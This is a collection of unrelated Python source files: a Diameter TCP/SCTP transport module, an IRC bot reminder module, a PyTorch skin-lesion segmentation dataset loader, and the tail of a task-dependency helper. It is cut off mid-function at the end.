LOG.info('Pending tasks:' + ', '.join((tsk.__name__ for tsk in pending)))
task_sync_mutex.release()
def start_pending():
def pending_task():
while True:
time.sleep(15)
log_pending()
t = threading.Thread(target=pending_task)
t.setDaemon(True)
t.start()
def task_will_need(*args):
return _taskify(*args)
# methods cannot have extra attributes so you either use a class or a closure
# to duplicate tasks, BTW function copy also possible
class Task(object):
def __init__(self, fn, ctx):
self.fn = fn
self.ctx = ctx
self.__name__ = fn.__name__
def __call__(self, *args, **kwargs):
self.fn(self.ctx, *args, **kwargs)
def task_wants(*args, caller_name=None):
wait_for = _taskify(*args)
wait_for_names = [tsk.__name__ for tsk in wait_for]
if not caller_name:
curframe = inspect.currentframe()
calframe = inspect.getouterframes(curframe, 2)
caller_name = calframe[1][3]
if wait_for:
LOG.info('%s is waiting for: %s' % (caller_name, str(wait_for_names)))
for wf in wait_for:
wf.thr.join()
for task in args: # late fail, we do not want to interrupt the world
if task.failed:
raise util.TaskAbort('Aborting %s because %s failed' % (caller_name, task.__name__))
|
transport.py
|
# -*- coding: utf-8 -*-
"""
bromelia.transport
~~~~~~~~~~~~~~~~~~
This module defines the TCP transport layer connections that are used
by the Diameter application protocol underlying.
:copyright: (c) 2020-present Henrique Marques Ribeiro.
:license: MIT, see LICENSE for more details.
"""
import copy
import logging
import random
import selectors
import socket
import threading
from .config import TRACKING_SOCKET_EVENTS_TIMEOUT
tcp_connection = logging.getLogger("TcpConnection")
tcp_client = logging.getLogger("TcpClient")
tcp_server = logging.getLogger("TcpServer")
class TcpConnection():
def __init__(self, ip_address, port):
self._recv_buffer = b""
self._send_buffer = b""
self.send_data_stream_queued = False
self._recv_data_stream = b""
self._recv_data_available = threading.Event()
self.write_mode_on = threading.Event()
self.read_mode_on = threading.Event()
self.recv_data_consumed = False
self.ip_address = ip_address
self.port = port
self.sock = None
self.is_connected = False
self.sock_id = "".join(random.choice('0123456789ABCDEF') for i in range(16))
tcp_connection.debug(f"Creating Socket with ID {self.sock_id}")
self._stop_threads = False
self.selector = selectors.DefaultSelector()
self.tracking_events_count = 0
self.connection_attempts = 3
self.events_mask = selectors.EVENT_READ
def is_write_mode(self):
if self.events_mask & selectors.EVENT_WRITE:
return True
return False
def is_read_mode(self):
if self.events_mask & selectors.EVENT_READ:
return True
return False
def is_read_write_mode(self):
if self.events_mask & (selectors.EVENT_READ | selectors.EVENT_WRITE):
return True
return False
def close(self):
if not self.is_connected:
raise ConnectionError("There is no transport connection up for "\
"this PeerNode")
self.is_connected = False
try:
self.selector.unregister(self.sock)
tcp_connection.debug(f"[Socket-{self.sock_id}] De-registering "\
f"Socket from Selector address: "\
f"{self.selector.get_map()}")
self.sock.close()
tcp_connection.debug(f"[Socket-{self.sock_id}] Shutting "\
f"down Socket")
except KeyError as e:
tcp_connection.debug(f"[Socket-{self.sock_id}] There is no "\
f"such Selector registered")
self._stop_threads = True
def run(self):
if not self.is_connected:
raise ConnectionError(f"[Socket-{self.sock_id}] There is no "\
f"transport connection up for this Peer")
threading.Thread(name="transport_layer_bootstrapper",
target=self._run).start()
def _run(self):
while self.is_connected and not self._stop_threads:
self.events = self.selector.select(timeout=TRACKING_SOCKET_EVENTS_TIMEOUT)
self.tracking_events_count += TRACKING_SOCKET_EVENTS_TIMEOUT
for key, mask in self.events:
self.data_stream = key.data
if mask & selectors.EVENT_READ:
self.read()
if mask & selectors.EVENT_WRITE:
self.write()
def _set_selector_events_mask(self, mode, msg=None):
if mode == "r":
tcp_connection.debug(f"[Socket-{self.sock_id}] Updating "\
f"selector events mask [READ]")
self.events_mask = selectors.EVENT_READ
self.selector.modify(self.sock, self.events_mask)
self.write_mode_on.clear()
self.read_mode_on.set()
elif mode == "w":
tcp_connection.debug(f"[Socket-{self.sock_id}] Updating "\
f"selector events mask [WRITE]")
self.events_mask = selectors.EVENT_WRITE
self.selector.modify(self.sock, self.events_mask, data=msg)
self.write_mode_on.set()
self.read_mode_on.clear()
elif mode == "rw":
tcp_connection.debug(f"[Socket-{self.sock_id}] Updating "\
f"selector events mask [READ/WRITE]")
self.events_mask = selectors.EVENT_READ | selectors.EVENT_WRITE
self.selector.modify(self.sock, self.events_mask, data=msg)
self.write_mode_on.set()
self.read_mode_on.set()
else:
tcp_connection.debug(f"[Socket-{self.sock_id}] Updating "\
f"selector events mask: Invalid entry")
def _write(self):
if self._send_buffer:
try:
sent = self.sock.send(self._send_buffer)
tcp_connection.debug(f"[Socket-{self.sock_id}] Just sent "\
f"{sent} bytes in _send_buffer")
except BlockingIOError:
tcp_connection.exception(f"[Socket-{self.sock_id}] An error "\
f"has occurred")
self._stop_threads = True
else:
self._send_buffer = self._send_buffer[sent:]
tcp_connection.debug(f"[Socket-{self.sock_id}] Stream data "\
f"has been sent")
def write(self):
if not self.send_data_stream_queued and self.data_stream:
self._send_buffer += self.data_stream
self.send_data_stream_queued = True
tcp_connection.debug(f"[Socket-{self.sock_id}] Stream data has "\
f"been queued into _send_buffer: "\
f"{self._send_buffer.hex()}")
self._write()
if self.send_data_stream_queued and not self._send_buffer:
self._set_selector_events_mask("r")
self.send_data_stream_queued = False
tcp_connection.debug(f"[Socket-{self.sock_id}] There is no "\
f"data to be sent for a while")
def _read(self):
try:
data = self.sock.recv(4096*64)
tcp_connection.debug(f"[Socket-{self.sock_id}] Data received: "\
f"{data.hex()}")
except:
tcp_connection.exception(f"[Socket-{self.sock_id}] An Exception "\
f"has been raised")
self.error_has_raised = True
self._stop_threads = True
else:
if data:
self._recv_buffer += data
tcp_connection.debug(f"[Socket-{self.sock_id}] _recv_buffer: "\
f"{self._recv_buffer.hex()}")
else:
tcp_connection.debug(f"[Socket-{self.sock_id}] Peer closed "\
f"connection")
self._stop_threads = True
def read(self):
self._read()
if self._recv_buffer:
self._recv_data_stream += copy.copy(self._recv_buffer)
self._recv_data_available.set()
self._recv_buffer = b""
tcp_connection.debug(f"[Socket-{self.sock_id}] _recv_buffer has "\
f"been cleaned up")
self._set_selector_events_mask("r")
def test_connection(self):
while True:
try:
self.sock.send(b"")
return True
except OSError as e:
if e.args[0] == 10057:
self.connection_attempts -= self.connection_attempts
return False
class TcpClient(TcpConnection):
def __init__(self, ip_address, port):
super().__init__(ip_address, port)
def start(self):
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_client.debug(f"[Socket-{self.sock_id}] Client-side Socket: "\
f"{self.sock}")
self.sock.setblocking(False)
tcp_client.debug(f"[Socket-{self.sock_id}] Setting as "\
f"Non-Blocking")
self.sock.connect_ex((self.ip_address, self.port))
tcp_client.debug(f"[Socket-{self.sock_id}] Connecting to the "\
f"Remote Peer")
self.is_connected = True
self.selector.register(self.sock, selectors.EVENT_READ | selectors.EVENT_WRITE)
tcp_client.debug(f"[Socket-{self.sock_id}] Registering Socket "\
f"Selector address: {self.selector.get_map()}")
except Exception as e:
tcp_client.exception(f"client_errors: {e.args}")
class TcpServer(TcpConnection):
def __init__(self, ip_address, port):
super().__init__(ip_address, port)
def start(self):
try:
self.server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_connection.debug(f"[Socket-{self.sock_id}] Server-side "\
f"Socket: {self.server_sock}")
self.server_selector = selectors.DefaultSelector()
self.server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 4096*64)
self.server_sock.bind((self.ip_address, self.port))
self.server_sock.listen()
tcp_server.debug(f"[Socket-{self.sock_id}] Listening on "\
f"{self.ip_address}:{self.port}")
self.server_sock.setblocking(False)
tcp_server.debug(f"[Socket-{self.sock_id}] Setting as "\
f"Non-Blocking")
self.server_selector.register(self.server_sock, selectors.EVENT_READ | selectors.EVENT_WRITE)
tcp_server.debug(f"[Socket-{self.sock_id}] Registering "\
f"Socket into Selector address: "\
f"{self.server_selector.get_map()}")
except Exception as e:
tcp_server.exception(f"server_error: {e.args}")
def run(self):
events = self.server_selector.select(timeout=None)
for key, mask in events:
tcp_server.debug(f"[Socket-{self.sock_id}] Event has been "\
f"raised on Main Socket: (mask, key) = "\
f"({mask}, {key})")
if key.data is None:
self.sock, self.remote_address = self.server_sock.accept()
self.sock.setblocking(False)
tcp_server.debug(f"[Socket-{self.sock_id}] New Socket "\
f"bound to Main Socket: {self.sock}")
self.is_connected = True
self.selector.register(self.sock, selectors.EVENT_READ)
tcp_server.debug(f"[Socket-{self.sock_id}] Registering "\
f"New Socket into Selector address: "\
f"{self.selector.get_map()}")
super().run()
def close(self):
super().close()
try:
self.server_selector.unregister(self.server_sock)
tcp_server.debug(f"De-registering Main Socket from Selector "\
f"address: {self.server_selector.get_map()}")
self.server_sock.close()
tcp_server.debug("Shutting down Main Socket")
except KeyError:
tcp_server.debug("There is no such Selector registered")
import importlib
class SctpConnection(TcpConnection):
def __init__(self, ip_address, port):
self.sctp = importlib.import_module("sctp")
self._sctp = importlib.import_module("_sctp")
super().__init__(ip_address, port)
def _write(self):
if self._send_buffer:
try:
sent = self.sock.sctp_send(self._send_buffer)
tcp_connection.debug(f"[Socket-{self.sock_id}] Just sent "\
f"{sent} bytes in _send_buffer")
except BlockingIOError:
tcp_connection.exception(f"[Socket-{self.sock_id}] An error "\
f"has occurred")
self._stop_threads = True
else:
self._send_buffer = self._send_buffer[sent:]
tcp_connection.debug(f"[Socket-{self.sock_id}] Stream data "\
f"has been sent")
def _read(self):
try:
fromaddr, flags, data, notif = self.sock.sctp_recv(4096*64)
print("Msg arrived, flag %d" % flags)
tcp_connection.debug(f"[Socket-{self.sock_id}] Data received: "\
f"{data.hex()}")
except:
tcp_connection.exception(f"[Socket-{self.sock_id}] An Exception "\
f"has been raised")
self.error_has_raised = True
self._stop_threads = True
else:
if data:
self._recv_buffer += data
tcp_connection.debug(f"[Socket-{self.sock_id}] _recv_buffer: "\
f"{self._recv_buffer.hex()}")
else:
tcp_connection.debug(f"[Socket-{self.sock_id}] Peer closed "\
f"connection")
self._stop_threads = True
def test_connection(self):
state = self.sock.get_status()
if self.sock.get_status().state == state.state_ESTABLISHED:
return True
else:
self.connection_attempts -= self.connection_attempts
return False
class SctpClient(TcpClient,SctpConnection):
def __init__(self, ip_address, port):
SctpConnection.__init__(self, ip_address, port)
def test_connection(self):
return SctpConnection.test_connection(self)
def _read(self):
return SctpConnection._read(self)
def _write(self):
return SctpConnection._write(self)
def start(self):
try:
self.sock = self.sctp.sctpsocket_tcp(socket.AF_INET)
tcp_client.debug(f"[Socket-{self.sock_id}] Client-side Socket: "\
f"{self.sock}")
tcp_client.debug(f"[Socket-{self.sock_id}] Connecting to the "\
f"Remote Peer")
self.sock.connect((self.ip_address, self.port))
self.is_connected = True
tcp_client.debug(f"[Socket-{self.sock_id}] Setting as "\
f"Non-Blocking")
self.sock.setblocking(False)
tcp_client.debug(f"[Socket-{self.sock_id}] Registering Socket "\
f"Selector address: {self.selector.get_map()}")
self.selector.register(self.sock, selectors.EVENT_READ | selectors.EVENT_WRITE)
except Exception as e:
tcp_client.exception(f"client_errors: {e.args}")
class SctpServer(TcpServer,SctpConnection):
def __init__(self, ip_address, port):
SctpConnection.__init__(self, ip_address, port)
def test_connection(self):
return SctpConnection.test_connection(self)
def _read(self):
return SctpConnection._read(self)
def _write(self):
return SctpConnection._write(self)
def start(self):
try:
if self._sctp.getconstant("IPPROTO_SCTP") != 132:
raise Exception("SCTP not supported by system")
self.server_sock = self.sctp.sctpsocket_tcp(socket.AF_INET)
# sock.initparams.max_instreams = 3
# sock.initparams.max_ostreams = 3
# sock.events.clear()
# sock.events.data_io = 1
tcp_connection.debug(f"[Socket-{self.sock_id}] Server-side "\
f"Socket: {self.server_sock}")
self.server_selector = selectors.DefaultSelector()
self.server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 4096*64)
self.server_sock.bind((self.ip_address, self.port))
self.server_sock.listen()
tcp_server.debug(f"[Socket-{self.sock_id}] Listening on "\
f"{self.ip_address}:{self.port}")
self.server_sock.setblocking(False)
tcp_server.debug(f"[Socket-{self.sock_id}] Setting as "\
f"Non-Blocking")
self.server_selector.register(self.server_sock, selectors.EVENT_READ | selectors.EVENT_WRITE)
tcp_server.debug(f"[Socket-{self.sock_id}] Registering "\
f"Socket into Selector address: "\
f"{self.server_selector.get_map()}")
except Exception as e:
tcp_server.exception(f"server_error: {e.args}")
|
remind.py
|
"""
remind.py - Willie Reminder Module
Copyright 2011, Sean B. Palmer, inamidst.com
Licensed under the Eiffel Forum License 2.
http://willie.dftba.net
"""
import os
import re
import time
import threading
import collections
from pytz import timezone, all_timezones_set
import pytz
import codecs
from datetime import datetime
from willie.module import commands, example, NOLIMIT
def filename(self):
name = self.nick + '-' + self.config.host + '.reminders.db'
return os.path.join(self.config.dotdir, name)
def load_database(name):
data = {}
if os.path.isfile(name):
f = codecs.open(name, 'r', encoding='utf-8')
for line in f:
unixtime, channel, nick, message = line.split('\t')
message = message.rstrip('\n')
t = int(float(unixtime)) # WTFs going on here?
reminder = (channel, nick, message)
try:
data[t].append(reminder)
except KeyError:
data[t] = [reminder]
f.close()
return data
def dump_database(name, data):
f = codecs.open(name, 'w', encoding='utf-8')
for unixtime, reminders in data.iteritems():
for channel, nick, message in reminders:
f.write('%s\t%s\t%s\t%s\n' % (unixtime, channel, nick, message))
f.close()
def setup(bot):
#Having a db means pref's exists. Later, we can just use `if bot.db`.
if bot.db and not bot.db.preferences.has_columns('tz'):
bot.db.preferences.add_columns(['tz'])
if bot.db and not bot.db.preferences.has_columns('time_format'):
bot.db.preferences.add_columns(['tz'])
bot.rfn = filename(bot)
bot.rdb = load_database(bot.rfn)
def monitor(bot):
time.sleep(5)
while True:
now = int(time.time())
unixtimes = [int(key) for key in bot.rdb]
oldtimes = [t for t in unixtimes if t <= now]
if oldtimes:
for oldtime in oldtimes:
for (channel, nick, message) in bot.rdb[oldtime]:
if message:
bot.msg(channel, nick + ': ' + message)
else:
bot.msg(channel, nick + '!')
del bot.rdb[oldtime]
dump_database(bot.rfn, bot.rdb)
time.sleep(2.5)
targs = (bot,)
t = threading.Thread(target=monitor, args=targs)
t.start()
scaling = collections.OrderedDict([
('years', 365.25 * 24 * 3600),
('year', 365.25 * 24 * 3600),
('yrs', 365.25 * 24 * 3600),
('y', 365.25 * 24 * 3600),
('months', 29.53059 * 24 * 3600),
('month', 29.53059 * 24 * 3600),
('mo', 29.53059 * 24 * 3600),
('weeks', 7 * 24 * 3600),
('week', 7 * 24 * 3600),
('wks', 7 * 24 * 3600),
('wk', 7 * 24 * 3600),
('w', 7 * 24 * 3600),
('days', 24 * 3600),
('day', 24 * 3600),
('d', 24 * 3600),
('hours', 3600),
('hour', 3600),
('hrs', 3600),
('hr', 3600),
('h', 3600),
('minutes', 60),
('minute', 60),
('mins', 60),
('min', 60),
('m', 60),
('seconds', 1),
('second', 1),
('secs', 1),
('sec', 1),
('s', 1),
])
periods = '|'.join(scaling.keys())
@commands('in')
@example('.in 3h45m Go to class')
def remind(bot, trigger):
"""Gives you a reminder in the given amount of time."""
duration = 0
message = re.split('(\d+(?:\.\d+)? ?(?:' + periods + ')) ?', trigger.group(2))[1:]
reminder = ''
stop = False
for piece in message:
grp = re.match('(\d+(?:\.\d+)?) ?(.*) ?', piece)
if grp and not stop:
length = float(grp.group(1))
print length
factor = scaling.get(grp.group(2), 60)
duration += length * factor
else:
reminder = reminder + piece
stop = True
if duration == 0:
return bot.reply("Sorry, didn't understand the input.")
if duration % 1:
duration = int(duration) + 1
else:
duration = int(duration)
tzi = timezone('UTC')
if bot.db and trigger.nick in bot.db.preferences:
tz = bot.db.preferences.get(trigger.nick, 'tz') or 'UTC'
tzi = timezone(tz)
create_reminder(bot, trigger, duration, reminder, tzi)
@commands('at')
@example('.at 13:47 Do your homework!')
def at(bot, trigger):
"""
Gives you a reminder at the given time. Takes hh:mm:ssContinent/Large_City
message. Continent/Large_City is a timezone from the tzdb; a list of valid
options is available at http://dft.ba/-tz . The seconds and timezone are
optional.
"""
regex = re.compile(r'(\d+):(\d+)(?::(\d+))?([^\s\d]+)? (.*)')
match = regex.match(trigger.group(2))
if not match:
bot.reply("Sorry, but I didn't understand your input.")
return NOLIMIT
hour, minute, second, tz, message = match.groups()
if not second:
second = '0'
if tz:
if tz not in all_timezones_set:
good_tz = False
if bot.db and tz in bot.db.preferences:
tz = bot.db.preferences.get(tz, 'tz')
if tz:
tzi = timezone(tz)
good_tz = True
if not good_tz:
bot.reply("I don't know that timezone or user.")
return NOLIMIT
else:
tzi = timezone(tz)
elif bot.db and trigger.nick in bot.db.preferences:
tz = bot.db.preferences.get(trigger.nick, 'tz')
if tz:
tzi = timezone(tz)
else:
tzi = timezone('UTC')
else:
tzi = timezone('UTC')
now = datetime.now(tzi)
timediff = (datetime(now.year, now.month, now.day, int(hour), int(minute),
int(second), tzinfo=now.tzinfo)
- now)
duration = timediff.seconds
if duration < 0:
duration += 86400
create_reminder(bot, trigger, duration, message, timezone('UTC'))
def create_reminder(bot, trigger, duration, message, tz):
t = int(time.time()) + duration
reminder = (trigger.sender, trigger.nick, message)
try:
bot.rdb[t].append(reminder)
except KeyError:
bot.rdb[t] = [reminder]
dump_database(bot.rfn, bot.rdb)
if duration >= 60:
tformat = "%F - %T%Z"
if bot.db and trigger.nick in bot.db.preferences:
tformat = (bot.db.preferences.get(trigger.nick, 'time_format')
or "%F - %T%Z")
timef = datetime.fromtimestamp(t, tz).strftime(tformat)
bot.reply('Okay, will remind at %s' % timef)
else:
bot.reply('Okay, will remind in %s secs' % duration)
|
ISICDataset.py
|
# ----------------------------------------
# Written by Xiaoqing GUO
# ----------------------------------------
from __future__ import print_function, division
import os
import torch
import pandas as pd
import cv2
import multiprocessing
from skimage import io
from PIL import Image
import numpy as np
from torch.utils.data import Dataset
from datasets.transform import *
class ISICDataset(Dataset):
def __init__(self, dataset_name, cfg, period, aug=False):
self.dataset_name = dataset_name
self.root_dir = os.path.join(cfg.ROOT_DIR,'data')
self.dataset_dir = os.path.join(self.root_dir,dataset_name)
self.rst_dir = os.path.join(self.root_dir,'results',dataset_name,'Segmentation')
self.eval_dir = os.path.join(self.root_dir,'eval_result',dataset_name,'Segmentation')
self.period = period
self.img_dir = os.path.join(self.dataset_dir, 'images')
self.ann_dir = os.path.join(self.dataset_dir, 'annotations')
self.seg_dir = os.path.join(self.dataset_dir, 'annotations')
self.set_dir = os.path.join(self.root_dir, dataset_name)
file_name = None
if aug:
file_name = self.set_dir+'/'+period+'aug.txt'
else:
file_name = self.set_dir+'/'+period+'.txt'
df = pd.read_csv(file_name, names=['filename'])
self.name_list = df['filename'].values
self.rescale = None
self.centerlize = None
self.randomcrop = None
self.randomflip = None
self.randomrotation = None
self.randomscale = None
self.randomhsv = None
self.multiscale = None
self.totensor = ToTensor()
self.cfg = cfg
if dataset_name == 'ISIC2017':
self.categories = ['melanoma']
self.coco2voc = [[0],
[5],
[2],
[16],
[9],
[44],#,46,86],
[6],
[3],#,8],
[17],
[62],
[21],
[67],
[18],
[19],#,24],
[4],
[1],
[64],
[20],
[63],
[7],
[72]]
self.num_categories = len(self.categories)
assert(self.num_categories+1 == self.cfg.MODEL_NUM_CLASSES)
self.cmap = self.__colormap(len(self.categories)+1)
if cfg.DATA_RESCALE > 0:
self.rescale = Rescale(cfg.DATA_RESCALE,fix=False)
self.centerlize = Centerlize(cfg.DATA_RESCALE)
if 'train' in self.period:
if cfg.DATA_RANDOMCROP > 0:
self.randomcrop = RandomCrop(cfg.DATA_RANDOMCROP)
if cfg.DATA_RANDOMROTATION > 0:
self.randomrotation = RandomRotation(cfg.DATA_RANDOMROTATION)
if cfg.DATA_RANDOMSCALE != 1:
self.randomscale = RandomScale(cfg.DATA_RANDOMSCALE)
if cfg.DATA_RANDOMFLIP > 0:
self.randomflip = RandomFlip(cfg.DATA_RANDOMFLIP)
if cfg.DATA_RANDOM_H > 0 or cfg.DATA_RANDOM_S > 0 or cfg.DATA_RANDOM_V > 0:
self.randomhsv = RandomHSV(cfg.DATA_RANDOM_H, cfg.DATA_RANDOM_S, cfg.DATA_RANDOM_V)
else:
self.multiscale = Multiscale(self.cfg.TEST_MULTISCALE)
def __len__(self):
return len(self.name_list)
def __getitem__(self, idx):
name = self.name_list[idx].split()[0]
img_file = self.img_dir + '/' + name
image = cv2.imread(img_file)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# image = np.array(io.imread(img_file),dtype=np.uint8)
r,c,_ = image.shape
sample = {'image': image, 'name': name, 'row': r, 'col': c}
if 'train' in self.period:
seg_file = self.seg_dir + '/' + self.name_list[idx].split()[1]
segmentation = np.array(Image.open(seg_file))
#(T, segmentation) = cv2.threshold(segmentation, 0, 255, cv2.THRESH_BINARY)
sample['segmentation'] = segmentation/255.
if self.cfg.DATA_RANDOM_H>0 or self.cfg.DATA_RANDOM_S>0 or self.cfg.DATA_RANDOM_V>0:
sample = self.randomhsv(sample)
if self.cfg.DATA_RANDOMFLIP > 0:
sample = self.randomflip(sample)
if self.cfg.DATA_RANDOMROTATION > 0:
sample = self.randomrotation(sample)
if self.cfg.DATA_RANDOMSCALE != 1:
sample = self.randomscale(sample)
if self.cfg.DATA_RANDOMCROP > 0:
sample = self.randomcrop(sample)
if self.cfg.DATA_RESCALE > 0:
#sample = self.centerlize(sample)
sample = self.rescale(sample)
else:
seg_file = self.seg_dir + '/' + self.name_list[idx].split()[1]
segmentation = np.array(Image.open(seg_file))
#(T, segmentation) = cv2.threshold(segmentation, 0, 255, cv2.THRESH_BINARY)
sample['segmentation'] = segmentation/255.
if self.cfg.DATA_RESCALE > 0:
sample = self.rescale(sample)
sample = self.multiscale(sample)
if 'segmentation' in sample.keys():
sample['mask'] = sample['segmentation'] < self.cfg.MODEL_NUM_CLASSES
#print(sample['segmentation'].max(),sample['segmentation'].shape)
t = sample['segmentation']
t[t >= self.cfg.MODEL_NUM_CLASSES] = 0
#print(t.max(),t.shape)
#print(onehot(np.int32(t),self.cfg.MODEL_NUM_CLASSES))
sample['segmentation_onehot']=onehot(np.int32(t),self.cfg.MODEL_NUM_CLASSES)
sample = self.totensor(sample)
return sample
def __colormap(self, N):
"""Get the map from label index to color
Args:
N: number of class
return: a Nx3 matrix
"""
cmap = np.zeros((N, 3), dtype = np.uint8)
def uint82bin(n, count=8):
"""returns the binary of integer n, count refers to amount of bits"""
return ''.join([str((n >> y) & 1) for y in range(count-1, -1, -1)])
for i in range(N):
r = 0
g = 0
b = 0
idx = i
for j in range(7):
str_id = uint82bin(idx)
r = r ^ ( np.uint8(str_id[-1]) << (7-j))
g = g ^ ( np.uint8(str_id[-2]) << (7-j))
b = b ^ ( np.uint8(str_id[-3]) << (7-j))
idx = idx >> 3
cmap[i, 0] = r
cmap[i, 1] = g
cmap[i, 2] = b
return cmap
def label2colormap(self, label):
m = label.astype(np.uint8)
r,c = m.shape
cmap = np.zeros((r,c,3), dtype=np.uint8)
cmap[:,:,0] = (m&1)<<7 | (m&8)<<3
cmap[:,:,1] = (m&2)<<6 | (m&16)<<2
cmap[:,:,2] = (m&4)<<5
return cmap
def save_result(self, result_list, model_id):
"""Save test results
Args:
result_list(list of dict): [{'name':name1, 'predict':predict_seg1},{...},...]
"""
i = 1
folder_path = os.path.join(self.rst_dir,'%s_%s_cls'%(model_id,self.period))
if not os.path.exists(folder_path):
os.makedirs(folder_path)
for sample in result_list:
file_path = os.path.join(folder_path, '%s'%sample['name'])
# predict_color = self.label2colormap(sample['predict'])
# p = self.__coco2voc(sample['predict'])
cv2.imwrite(file_path, sample['predict'])
# print('[%d/%d] %s saved'%(i,len(result_list),file_path))
i+=1
def save_result_train(self, result_list, model_id):
"""Save test results
Args:
result_list(list of dict): [{'name':name1, 'predict':predict_seg1},{...},...]
"""
i = 1
folder_path = os.path.join(self.rst_dir,'%s_%s_cls'%(model_id,self.period))
if not os.path.exists(folder_path):
os.makedirs(folder_path)
for sample in result_list:
file_path = os.path.join(folder_path, '%s'%sample['name'])
img_file = self.img_dir + '/' + sample['name']
input_img = cv2.imread(img_file)
input_img = cv2.resize(input_img, (sample['predict'].shape[0],sample['predict'].shape[1]))
pred_img = np.stack([sample['predict'], sample['predict'], sample['predict']]).transpose((1,2,0))
lab_img = np.stack([sample['label'], sample['label'], sample['label']]).transpose((1,2,0))
img=np.zeros([input_img.shape[0], input_img.shape[1]*3, input_img.shape[2]])
img[:,:input_img.shape[1], :] = input_img
img[:,input_img.shape[1]:input_img.shape[1]*2, :] = pred_img
img[:,input_img.shape[1]*2:, :] = lab_img
cv2.imwrite(file_path, img)
# print('[%d/%d] %s saved'%(i,len(result_list),file_path))
i+=1
def save_result_train_thres(self, result_list, model_id):
"""Save test results
Args:
result_list(list of dict): [{'name':name1, 'predict':predict_seg1},{...},...]
"""
i = 1
folder_path = os.path.join(self.rst_dir,'%s_%s_cls'%(model_id,self.period))
if not os.path.exists(folder_path):
os.makedirs(folder_path)
for sample in result_list:
file_path = os.path.join(folder_path, '%s'%sample['name'])
img_file = self.img_dir + '/' + sample['name']
input_img = cv2.imread(img_file)
input_img = cv2.resize(input_img, (sample['predict'].shape[0],sample['predict'].shape[1]))
pred_img = np.stack([sample['predict'], sample['predict'], sample['predict']]).transpose((1,2,0))
lab_img = np.stack([sample['label'], sample['label'], sample['label']]).transpose((1,2,0))
thres_img = np.stack([sample['threshold'], sample['threshold'], sample['threshold']]).transpose((1,2,0))
img=np.zeros([input_img.shape[0], input_img.shape[1]*4, input_img.shape[2]])
img[:,:input_img.shape[1], :] = input_img
img[:,input_img.shape[1]:input_img.shape[1]*2, :] = thres_img
img[:,input_img.shape[1]*2:input_img.shape[1]*3, :] = pred_img
img[:,input_img.shape[1]*3:, :] = lab_img
cv2.imwrite(file_path, img)
# print('[%d/%d] %s saved'%(i,len(result_list),file_path))
i+=1
def save_result_train_mixup(self, dataset_list, model_id):
"""Save test results
Args:
result_list(list of dict): [{'name':name1, 'predict':predict_seg1},{...},...]
"""
i = 1
folder_path = os.path.join(self.rst_dir,'%s_%s_mixup_lambda'%(model_id,self.period))
if not os.path.exists(folder_path):
os.makedirs(folder_path)
for sample in dataset_list:
file_path = os.path.join(folder_path, '%s'%sample['name'])
inputs_batched = sample['inputs_batched'].transpose((1,2,0))
mixup_inputs_batched = sample['mixup_inputs_batched'].transpose((1,2,0))
mixup_input = sample['mixup_input'].transpose((1,2,0))
inputs_labels = np.stack([sample['inputs_labels'], sample['inputs_labels'], sample['inputs_labels']]).transpose((1,2,0))
mixup_labels_batched = np.stack([sample['mixup_labels_batched'], sample['mixup_labels_batched'], sample['mixup_labels_batched']]).transpose((1,2,0))
mixup_label = np.stack([sample['mixup_label'], sample['mixup_label'], sample['mixup_label']]).transpose((1,2,0))
cosSimi1 = np.stack([sample['cosSimi1'], sample['cosSimi1'], sample['cosSimi1']]).transpose((1,2,0))
cosSimi2 = np.stack([sample['cosSimi2'], sample['cosSimi2'], sample['cosSimi2']]).transpose((1,2,0))
img=np.zeros([inputs_batched.shape[0]*3, inputs_batched.shape[1]*3, inputs_batched.shape[2]])
img[:inputs_batched.shape[0],:inputs_batched.shape[1], :] = inputs_batched
img[:inputs_batched.shape[0],inputs_batched.shape[1]:inputs_batched.shape[1]*2, :] = mixup_inputs_batched
img[:inputs_batched.shape[0],inputs_batched.shape[1]*2:inputs_batched.shape[1]*3, :] = mixup_input
img[inputs_batched.shape[0]:inputs_batched.shape[0]*2,:inputs_batched.shape[1], :] = inputs_labels
img[inputs_batched.shape[0]:inputs_batched.shape[0]*2,inputs_batched.shape[1]*1:inputs_batched.shape[1]*2, :] = mixup_labels_batched
img[inputs_batched.shape[0]:inputs_batched.shape[0]*2,inputs_batched.shape[1]*2:inputs_batched.shape[1]*3, :] = mixup_label
img[inputs_batched.shape[0]*2:,:inputs_batched.shape[1], :] = cosSimi1
img[inputs_batched.shape[0]*2:,inputs_batched.shape[1]*1:inputs_batched.shape[1]*2, :] = cosSimi2
img_RGB=np.zeros([inputs_batched.shape[0]*3, inputs_batched.shape[1]*3, inputs_batched.shape[2]])
img_RGB[:,:,0] = img[:,:,2]
img_RGB[:,:,1] = img[:,:,1]
img_RGB[:,:,2] = img[:,:,0]
cv2.imwrite(file_path, img_RGB)
# print('[%d/%d] %s saved'%(i,len(result_list),file_path))
i+=1
def do_matlab_eval(self, model_id):
import subprocess
path = os.path.join(self.root_dir, 'VOCcode')
eval_filename = os.path.join(self.eval_dir,'%s_result.mat'%model_id)
cmd = 'cd {} && '.format(path)
cmd += 'matlab -nodisplay -nodesktop '
cmd += '-r "dbstop if error; VOCinit; '
cmd += 'VOCevalseg(VOCopts,\'{:s}\');'.format(model_id)
cmd += 'accuracies,avacc,conf,rawcounts = VOCevalseg(VOCopts,\'{:s}\'); '.format(model_id)
cmd += 'save(\'{:s}\',\'accuracies\',\'avacc\',\'conf\',\'rawcounts\'); '.format(eval_filename)
cmd += 'quit;"'
print('start subprocess for matlab evaluation...')
print(cmd)
subprocess.call(cmd, shell=True)
def do_python_eval(self, model_id):
predict_folder = os.path.join(self.rst_dir,'%s_%s_cls'%(model_id,self.period))
gt_folder = self.seg_dir
TP = []
P = []
T = []
for i in range(self.cfg.MODEL_NUM_CLASSES):
TP.append(multiprocessing.Value('i', 0, lock=True))
P.append(multiprocessing.Value('i', 0, lock=True))
T.append(multiprocessing.Value('i', 0, lock=True))
'''def compare(start,step,TP,P,T):
for idx in range(start,len(self.name_list),step):
print('%d/%d'%(idx,len(self.name_list)))
name_image = self.name_list[idx].split()[0]
name_seg = self.name_list[idx].split()[1]
predict_file = os.path.join(predict_folder,'%s'%name_image)
gt_file = os.path.join(gt_folder,'%s'%name_seg)
predict = np.array(Image.open(predict_file)) #cv2.imread(predict_file)
gt = np.array(Image.open(gt_file))
